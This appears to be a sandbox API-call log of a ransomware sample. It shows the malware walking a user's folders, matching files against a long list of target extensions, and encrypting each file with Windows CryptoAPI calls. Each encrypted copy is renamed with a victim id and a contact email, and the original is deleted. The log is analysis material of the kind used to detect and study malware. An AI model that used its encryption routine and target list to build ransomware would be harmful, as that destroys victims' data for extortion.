	[0201.136] lstrcpyW (in: lpString1=0x1889b4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0201.136] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\", lpString2="7uPxTvsZGEKuH-t.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\7uPxTvsZGEKuH-t.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\7uPxTvsZGEKuH-t.swf"
	[0201.136] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\7uPxTvsZGEKuH-t.swf") returned 131
	[0201.137] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.137] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\7uPxTvsZGEKuH-t.swf", cchLength=0x83 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf") returned 0x83
	[0201.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.137] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.137] lstrcpyW (in: lpString1=0x18855c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf"
	[0201.137] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf") returned 131
	[0201.137] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.138] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0201.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.138] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.138] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.139] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.139] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.144] ReadFile (in: hFile=0x3ac, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0x152a8, lpNumberOfBytesRead=0x187f10, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x187f10*=0x152a8, lpOverlapped=0x0) returned 1
	[0201.148] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.148] CryptAcquireContextW (in: phProv=0x187ac0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x187ac0*=0xfcb198) returned 1
	[0201.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.151] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x187ac4 | out: phHash=0x187ac4) returned 1
	[0201.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.151] CryptHashData (hHash=0xfb9530, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.151] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9530, dwFlags=0x1, phKey=0x187ac8 | out: phKey=0x187ac8*=0xfb9470) returned 1
	[0201.151] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.151] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x187adc*=0x152a8, dwBufLen=0x152a8 | out: pbData=0x0*, pdwDataLen=0x187adc*=0x152b0) returned 1
	[0201.154] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.154] RtlMoveMemory (in: Destination=0xff6450, Source=0xfe11a0, Length=0x152a8 | out: Destination=0xff6450) 
	[0201.154] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.154] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff6450*, pdwDataLen=0x187abc*=0x152a8, dwBufLen=0x152b0 | out: pbData=0xff6450*, pdwDataLen=0x187abc*=0x152b0) returned 1
	[0201.157] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.157] CryptDestroyKey (hKey=0xfb9470) returned 1
	[0201.157] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.157] CryptDestroyHash (hHash=0xfb9530) returned 1
	[0201.157] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.182] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0201.182] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.182] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187ad8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187ad8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.183] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.183] GetUserNameA (in: lpBuffer=0x1879bc, pcbBuffer=0x187ad4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187ad4) returned 1
	[0201.184] wsprintfW (in: param_1=0x187af0, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 173
	[0201.184] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b0
	[0201.185] WriteFile (in: hFile=0x3b0, lpBuffer=0xff6450*, nNumberOfBytesToWrite=0x152b0, lpNumberOfBytesWritten=0x187f18, lpOverlapped=0x0 | out: lpBuffer=0xff6450*, lpNumberOfBytesWritten=0x187f18*=0x152b0, lpOverlapped=0x0) returned 1
	[0201.192] CloseHandle (hObject=0x3b0) returned 1
	[0201.192] CloseHandle (hObject=0x3ac) returned 1
	[0201.192] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf")) returned 1
	[0201.200] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\7upxtvszgekuh-t.swf")) returned 0
	[0201.200] FindNextFileW (in: hFindFile=0xfb92b0, lpFindFileData=0x188764 | out: lpFindFileData=0x188764*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad660f00, ftCreationTime.dwHighDateTime=0x1d9766d, ftLastAccessTime.dwLowDateTime=0x6e8507f0, ftLastAccessTime.dwHighDateTime=0x1d9769f, ftLastWriteTime.dwLowDateTime=0x6e8507f0, ftLastWriteTime.dwHighDateTime=0x1d9769f, nFileSizeHigh=0x0, nFileSizeLow=0xaf71, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="9uPC.swf", cAlternateFileName="")) returned 1
	[0201.200] lstrcmpW (lpString1="9uPC.swf", lpString2="..") returned 1
	[0201.200] lstrcmpW (lpString1="9uPC.swf", lpString2=".") returned 1
	[0201.201] lstrcpyW (in: lpString1=0x1889b4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\"
	[0201.201] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\", lpString2="9uPC.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\9uPC.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\9uPC.swf"
	[0201.201] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\9uPC.swf") returned 120
	[0201.201] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.201] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\9uPC.swf", cchLength=0x78 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf") returned 0x78
	[0201.201] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.201] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.202] lstrcpyW (in: lpString1=0x18855c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf"
	[0201.202] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\9upc.swf") returned 120
	[0201.202] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.202] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0201.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.203] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nf